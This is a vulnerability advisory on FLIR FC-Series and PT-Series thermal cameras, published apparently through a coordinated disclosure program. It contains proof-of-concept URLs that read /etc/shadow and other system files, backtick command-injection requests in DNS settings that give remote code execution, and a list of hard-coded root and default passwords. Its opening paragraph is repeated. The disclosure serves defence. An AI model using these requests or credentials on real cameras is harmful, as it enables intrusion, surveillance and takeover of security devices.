## Vulnerabilities Summary The following advisory describes 5 (five) vulnerabilities found in FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID, PT-Series. FLIR – “Best-in-class thermal cameras with on-board analytics for high-performance intrusion detection. The new FC-Series ID combines best-in-class thermal image detail and high-performance edge perimeter analytics together in a single device that delivers optimal intrusion detection in challenging environments and extreme conditions”. The vulnerabilities found are: * Information disclosure * Stream disclosure * Unauthenticated Remote Code Execution * Authenticated Remote Code Execution * Hard-coded Credentials ## Credit An independent security researcher, Gjoko Krstic – Zero Science Lab, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. ## Vendor Response The vendor has been notified on the 27th of June 2017, several emails were exchanged, but no ETA for a fix or...
## Vulnerabilities Summary The following advisory describes 5 (five) vulnerabilities found in FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID, PT-Series. FLIR – “Best-in-class thermal cameras with on-board analytics for high-performance intrusion detection. The new FC-Series ID combines best-in-class thermal image detail and high-performance edge perimeter analytics together in a single device that delivers optimal intrusion detection in challenging environments and extreme conditions”. The vulnerabilities found are: * Information disclosure * Stream disclosure * Unauthenticated Remote Code Execution * Authenticated Remote Code Execution * Hard-coded Credentials ## Credit An independent security researcher, Gjoko Krstic – Zero Science Lab, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. ## Vendor Response The vendor has been notified on the 27th of June 2017, several emails were exchanged, but no ETA for a fix or workaround have been provided for the following vulnerabilities. ## Vulnerabilities details ### Information Disclosure (1) The FLIR web-server webroot/js/fns.login.js provides API functionality. By using the following API calls an attacker can download and read files from the FLIR OS: * `/api/xml?file=PATH-TO-FILE` * `/api/file/download/PATH-TO-FILE` * `/api/file/content/PATH-TO-FILE` * `/api/server/videosnap?file=PATH-TO-FILE` * `/page/maintenance/view/server-lan` * `/api/file/ini/read` * `/api/system/config/product` #### Proof of Concept ``` http://IP/api/xml?file=/etc/passwd http://IP/api/xml?file=/etc/shadow http://IP:8081/api/file/download/etc/shadow http://IP:8081/api/file/download/etc/passwd http://IP:8081/api/file/content/var/log/messages http://IP:8081/api/server/videosnap?file=../../../../../../etc/passwd http://IP:8081/page/maintenance/view/server-lan http://IP/api/file/ini/read http://IP:8081/api/system/config/product ``` ### Stream Disclosure FLIR web-server does not validate if the user is authenticated when asked to show the live feed. #### Proof of Concept An attacker can get the live stream by sending sending the the following request: ``` http://IP:8081/graphics/livevideo/stream/stream3.jpg http://IP/graphics/livevideo/stream/stream1.jpg ``` ### Unauthenticated Remote Code Execution User controlled input is not sufficiently sanitized and can be exploit by an attacker to execute command on the machine. By sending GET request to /maintenance/controllerFlirSystem.php an attacker can trigger the vulnerability. #### Proof of Concept ``` GET /maintenance/controllerFlirSystem.php?dns%5Bdhcp%5D=%60COMMAND-TO-EXECUTE%60&dns%5Bserver1%5D=1.2.3.4&dns%5Bserver2%5D=&_=1491052263282 HTTP/1.1 ``` ### Authenticated Remote Code Execution User controlled input is not sufficiently sanitized and can be exploit by an attacker to execute command on the machine. By sending POST request to //page/maintenance/lanSettings/dns an attacker can trigger the vulnerability. #### Proof of Concept ``` POST /page/maintenance/lanSettings/dns HTTP/1.1 Host: TARGET:8081 Content-Length: 64 Accept: */* Origin: http://TARGET:8081 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://TARGET:8081/maintenance Accept-Language: en-US,en;q=0.8,mk;q=0.6 Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b DNT: 1 Connection: close dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60COMMAND-TO-EXECUTE%60 ``` ### Hard-coded Credentials ``` root:indigo root:video default:video default:[blank] ftp:video ```